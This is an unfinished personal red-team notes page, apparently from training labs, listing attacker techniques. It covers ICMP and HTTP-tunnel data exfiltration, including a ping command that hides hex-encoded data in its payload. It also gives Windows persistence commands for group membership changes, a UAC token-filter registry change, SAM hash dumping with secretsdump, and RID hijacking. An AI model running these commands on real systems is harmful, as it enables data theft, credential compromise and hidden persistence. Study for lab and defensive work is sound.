Processes
[!Note] Heavy work in progress
A curated list of steps/processes to use when tackling a certain problem.
When dealing with a certain challenge, you have to come up with a plan to come up with a solution. But you are not the first one to have dealt with this. So here I present a list of processes I have used that could help me and others finding the right programs/commands that they need.
Subjects
Knowledge Bases
| đ° Name | âšī¸ Description | đ Link |
|---|---|---|
| **** |
Cheatsheets
| đ° Name | âšī¸ Description | đ Link |
|---|---|---|
| **** |
Tools Top Tips
| đ° Name | âšī¸ Description | đ Link |
|---|---|---|
| **** |
Data Exfiltration
TCP Socket
SSH
HTTP(S)
HTTP Tunneling
Encapsulates other protocols and sends them back and forth via the HTTP protocol. Create an HTTP tunnel communication channel to pivot into the internal network and communicate with local network devices through HTTP protocol.
Use a Neo-reGeorg tool to establish a communication channel to access the internal network devices.
Generate a Neo-ReGeorg key
Upload tunnel file to the victim server.
Create the tunnel
Connect to a machine behind the webserver through the tunnel.
ICMP
Sending data with an ICMP ping packet
Manually
Convert payload into hex, for example with xxd.
Send a ping request with the payload.
ping <IP> -c <nr of requests> -p <payload in hex format>
ping 10.10.230.138 -c 1 -p 74686d3a7472796861636b6d650a
Capture the request with e.g., Wireshark.
MetaSploit
Select the icmp_exfill module to set a listener to capture any ICMP packets. It starts recording upon receiving a trigger and ends when an EOF trigger is received.
Set the correct interface to listen on.
Now Metasploit is waiting for a beginning of file trigger as stated.
Using nping or regular ping send a BOF trigger to start recording data (from the victim machine).
Send the rest of the data in a similar manner.
Send the EOF trigger.
Find the loot in the location as stated (on the attack machine).
Tunneling
ICMPDoor tool can be used to create an ICMP tunnel.
đ https://github.com/krabelize/icmpdoor
Setup a host on the victim machine.
Setup a client on the attack machine
Send commands to the victim machine as usual.
DNS
Misc
Persistence
Linux
Windows
Tampering With Unprivileged Accounts
Assign Group Memberships
- Make user part of Administrators group.
- If thats to suspicious, add to Backup Operators group and Remote Management for RDP.
net localgroup "Backup Operators" thmuser1 /add
net localgroup "Remote Management Users" thmuser1 /add
- Disable UAC privilige stripping for remote users.
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
- Remote into the machine (RDP or Evil-WinRM)
- Export and download SAM and SYSTEM registry hives.
- Dump hashes from SAM and SYSTEM hives.
python /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.bak -system system.bak LOCAL
- Pass the hash with admin account.
Special Privileges and Security Descriptors
- Add
SeBackupPrivilegeandSeRestorePrivilegeto an account.
secedit /export /cfg config.ini
secedit /import /cfg config.ini /db config.db
secedit /configure /db config.db /cfg config.ini
- Change WinRM security descriptor and add user here with full control.
- Disable UAC privilige stripping for remote users.
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
RID Hijacking
- Find RIDs of user and admin user.
- Open regedit with privileges (tool must be present on target system).
-
Find users here in the registry:
HKLM\SAM\SAM\Domains\Account\Users\. -
Convert (admin) RID to hex value (i.e., 1010 = 0x1F4) and change F variable within the correct user key with the RID of the admin account (little endian notation = 04F1 -> F4 01).
-
Admin hex RID ussualy is F4 01, put this on line 0030 of the F variable.